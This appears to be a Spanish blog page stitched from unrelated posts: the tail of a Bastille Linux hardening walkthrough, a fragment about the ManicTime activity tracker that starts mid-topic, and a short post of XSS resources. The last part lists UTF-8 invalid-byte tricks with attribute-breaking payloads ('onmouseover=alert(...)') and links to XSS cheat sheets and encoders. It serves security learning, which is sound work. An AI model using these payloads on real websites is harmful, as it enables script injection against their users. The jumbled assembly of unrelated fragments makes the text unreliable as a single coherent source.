  Descripción: La diferencia de esta pregunta a la anterior es que se refiere al uso de r-tools a nivel de servidor, es decir, permitir que se ejecute por ejemplo rsh en tu sistema y de esta forma poder acceder remotamente a él con rlogin. La misma razón que se describió en la pregunta anterior es por la que deberíamos desactivar estas herramientas.
• Grupo: AccountSecurity
  Would you like to enforce password aging? [Y]: Habilita un tiempo de caducidad de las contraseñas a 60 días. Antes de que pase ese tiempo se pedirá al usuario que cambie su contraseña. Si se cumple el plazo y el usuario no ha cambiado su contraseña se procederá a bloquear su cuenta hasta que el administrador la vuelva a activar (Véase usermod)
• Grupo: AccountSecurity
  Do you want to set the default umask? [Y]: El umask son los permisos por defecto que se le asignan a los ficheros que vaya creando. Lo más aconsejable es dejar que Bastille lo fije a un valor seguro (077).
• Grupo: AccountSecurity
  Should we disallow root login on tty’s 1-6? [N]: Las tty, son terminales accesibles desde las combinaciones CTRL+ALT+F1 hasta F7, por lo que Bastille nos ofrece deshabilitar el acceso root a dichas terminales para que sea conectado antes con un usuario normal con los mínimos privilegios posibles.
• Grupo: BootSecurity
  Would you like to password-protect the GRUB prompt? [N]: En caso de que un intruso tenga acceso físico al equipo, puede obtener una consola de root rebotando el equipo y pasándole unos parámetros determinados al GRUB. Para evitar esto, lo mejor es activar esta opción de tal manera que aunque se pueda reiniciar el equipo y arrancarlo normalmente, sólo se puedan pasar parámetros al GRUB autenticando antes con su respectiva contraseña, pero si lo que tenemos es un equipo remoto a disposición sin acceso físico alguno, mejor descartar esta opción.
• Grupo: BootSecurity
  Would you like to password protect single-user-mode? [Y]: El modo mono-usuario sirve para arrancar el sistema de manera que única y exclusivamente pueda acceder el superusuario. Es un tipo de acceso que se utiliza en casos de emergencia, cuando por ejemplo no se recuerda la contraseña de root ya que no suele solicitarse autentificación, esto supone un arma de doble filo que puede permitir el acceso no autorizado al sistema. Si se activa esta opción, Bastille evitará esta situación solicitando contraseña de root al acceder por dicho modo.
• Grupo: SecureInetd
  Would you like to set a default-deny on TCP Wrappers and xinetd? [N]: inetd es un demonio que se inicia al principio de la secuencia de arranque en Linux, que tiene la función de escuchar varios puertos concretos y así cuando una conexión a un puerto es requerida, inicia el proceso asociado a dicho puerto. Como pueden ser las de servicios de FTP, POP, IMAP, etcétera, por lo que no es recomendable desactivarlo si se quiere utilizar dichos servicios.
  
• Grupo: SecureInetd
  Would you like to display “Authorized Use” messages at log-in time? [Y]: Esta opción habilitará un mensaje que aparecerá al comienzo de las sesiones de consola. Este mensaje advertirá de que se está accediendo a un sistema restringido y que cualquier acceso no permitido puede ser perseguido por vía legal. Posteriormente podremos editar dicho mensaje para adecuarlo convenientemente a lo que diga el Departamento Jurídico. (Véase /etc/motd)
• Grupo: SecureInetd
  Who is responsible for granting authorization to use this machine?: Esta una pregunta dirigida a redactar el mensaje mencionado antes. En este caso se trata de identificar al responsable del equipo encargado de autorizar los diferentes accesos a él, en mi caso Pr0x.
• Grupo: ConfigureMiscPAM
  Would you like to put this limits on system resource usage? [N]: Permite establecer ciertos límites al número de procesos y memoria usados por usuario con el fin de evitar ataques de denegación de servicio. Si no se activa, posteriormente podemos configurarlo manualmente editando al archivo de configuración /etc/security/limits.conf
• Grupo: ConfigureMiscPAM
  Should we restrict console access to a small group of users accounts? [N]: En algunas distribuciones, los usuarios que inician sesión por consola tienen algunos derechos especiales de acceso (como la posibilidad de montar la unidad de CD-ROM). Esta opción es mucho más flexible, restringiendo el acceso a la consola.
• Grupo: Logging
  Would you like to add additional logging? [Y]: Configura el equipo para que incremente el número de fuentes de log y se añadan /var/log/kernel y /var/log/syslog siendo accesibles desde las terminales 7 y 8 (mediante Alt+F7 y F8 respectivamente)
• Grupo: Logging
  Do you have a remote logging host? [N]: Si ya tiene un registro de host remoto, se puede configurar la máquina para acceder a ella.
• Grupo: Logging
  Would you like to set up process accounting? [N]: Linux tiene la capacidad de registrar los comandos cuando se ejecutan y por quién. Esto es muy útil para tratar de analizar que es lo que realmente ha hecho un usuario concreto. El inconveniente es que los parámetros de comandos no se registran, pero con Bastille tenemos la posibilidad de activarlo teniendo en cuenta el uso excesivo de CPU y de disco. A menos que usted haya examinado cuidadosamente esta opción, es recomendable que seleccione que “No”.
• Grupo: MiscellaneousDaemons
  Would you like to desactive NFS and Samba? [Y]: Se recomienda encarecidamente desactivar ambos servicios a menos de que lo uséis por motivos convencionales, ya que NFS tiene bastantes vulnerabilidades de seguridad y Samba (SMB) siendo un mejor sistema de archivos compartidos, todavía plantea graves preocupaciones de seguridad potencialmente indeseables. Ambos servicios se basan en texto claro, lo que significa que los datos transferidos pueden ser detectados.
• Grupo: MiscellaneousDaemonslike
  Would you like to deactivate the HP OfficeJet (hpoj) script in this machine? [Y]: Con este script podemos activar el Hewlett Packard (HP) multifuncional (impresión/escaneo/copia/fax) si la tuviéramos, por lo contrario, para desactivarla tendríamos que responder afirmativamente a Bastille.
• Grupo: MiscellaneousDaemons
  Would you to deactive the ISDN script on this machine? [Y]: La teconología ISDN, traducido al español RDSI (Red digital de servicios integrados) está por defecto activado en muchas distribuciones Linux, siendo ésta un método impopular de conexión a Internet (64 kbps) sustituido actualmente por IDSL ofreciendo un servicio básico de RDSI utilizando la tecnología DSL y así obteniendo un mayor ancho de banda, por lo que puede ser desactivado sin preocupación alguna.
• Grupo: Apache
  Would you like to bind the web server to listen only to the localhost? [N]: Bind es el proceso mediante el cual se “enlaza o liga” un servicio a una determinada dirección IP o nombre de host, en este caso lo que se busca es si se debería configurar el servidor Web para recibir sólo aquellas peticiones que se originen en la dirección 127.0.0.1 o localhost, evitando así un posible punto de acceso al sistema. Esto es útil solo para aquellos que hagan su desarrollo a nivel local y lo utilicen para tal fin. Y aquellos que tengan un servidor Web que deberá ser accedido desde fuera, obviamente deberán contestar “No” a esta pregunta.
• Grupo: Apache
  Would you like to bind the web server to a particular interface? [N]: Similar a la anterior, pero al nivel de interfaz de red.
• Grupo: Apache
  Would you like to deactivate the following of symbolic links? [Y]: Impide que el servidor Web siga enlaces simbólicos ya que puede ser potencialmente peligroso. Su desactivación puede disminuir la probabilidad de que alguna vulnerabilidad en el futuro en Apache puede ser explotada.
• Grupo: TMPDIR
  Would you like to install TMPDIR/TMP scripts? [N]: Activar esta opción hará que Bastille instale unos scripts en las cuentas de los usuarios que configuren las variables TMPDIR y TMP de tal manera que utilicen directorios de ficheros temporales completamente individuales, en vez de que todos usen el /tmp lo que puede ser extremadamente peligroso en entornos multiusuarios.
• Grupo: Firewall
  Would you like to run the packet filtering script? [N]: Utiliza un script para generar reglas de firewall. Este script solo tiene soporte para el IPChains del kernel 2.2 y para Iptables del kernel 2.4 (En caso de que un kernel 2.4 no tenga activo el soporte de iptables se usará IPChains). Este script puede ser problemático para los que utilicen kernels 2.6.x sin embargo puede utilizarse como punto de partida y luego ser modificado posteriormente para adaptarse mejor a las características del kernel. Contestar afirmativamente a esta pregunta generará posteriores preguntas que ayudarán al script a crear las reglas necesarias para el firewall (quienes pueden acceder al sistema desde la red, qué protocolos se pueden servir, qué se colocará en los logs referentes a los procesamientos de acceso, etc.)
• Grupo: PSAD
  Are you finished making changes to your Bastille configuration?: Y ¡por fin! hemos llegado al final de nuestra trayectoria. Si estamos seguros de la configuración respondemos afirmativamente.

Finalmente, seleccionamos Go Back and Change Configuration para aplicar los cambios, pero si tan solo quisiéramos guardar la configuración, seleccionaríamos Exit Without Saving.

Y hasta aquí hemos llegado. Todas las funciones que busca configurar Bastille se pueden hacer manualmente, Bastille lo que tan solo ofrece es la posibilidad de hacer todo mucho más sencillo. Además, cabe decir que existen distribuciones ya hechas que implementan muchas políticas de seguridad, normalmente tienen el mismo nombre de la distribución seguido de la palabra Hardened (por ejemplo: Gentoo Hardened) y otra muy buena opción es Engarde Linux.

Un saludo Pr0x.

Básicamente, guarda todos estos datos para que posteriormente podamos verlos y navegar en ellos, así como el tiempo que están activos, permitiéndonos saber cuanto tiempo pasamos con el navegador, con el Office, o con cualquier otra aplicación que hayamos ejecutado usualmente.

Dichos datos, se van recopilando a través de tres líneas de tiempo:

- Actividad: Muestra los periodos en los que hemos estado activo así como periodos inactivos.
- Aplicaciones: Muestra que aplicaciones que hemos utilizado y por cuanto tiempo.
- Tags: Muestra los tags que hayamos creado, pudiendo de esta forma, marcar periodos de tiempo en los que realizar tareas concretas.

ManicTime es totalmente gratuito y funciona en Windows XP, Vista, 2003 y 2008.

Descargar | Manictime

Aquí mis típicos recursos.

UTF-8 invalids chars trick (no estaría mal hacer un artículo sobre esto que aprendí originalmente de c1c4tr1z , sería divertido ) :

* 0xEE = î” onmouseover=alert(/Chars/.source)
* 0xDE = Þ” onmouseover=alert(/Chars/.source)
* 0xC0  = À” onmouseover=alert(/Chars/.source)
* 0xDF = ß” onmouseover=alert(/Chars/.source)

New Vectors/Unusual JavaScripts

http://sla.ckers.org/forum/read.php?2,15812

XSS Cheat Sheet

http://ha.ckers.org/xss.html

PHP Charset Encoder (recomendado)

http://h4k.in/encoding/

Opera XSS Vectors

http://www.thespanner.co.uk/2009/05/08/opera-xss-vectors/

Hackvertor (recomendado)

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php

Saludos!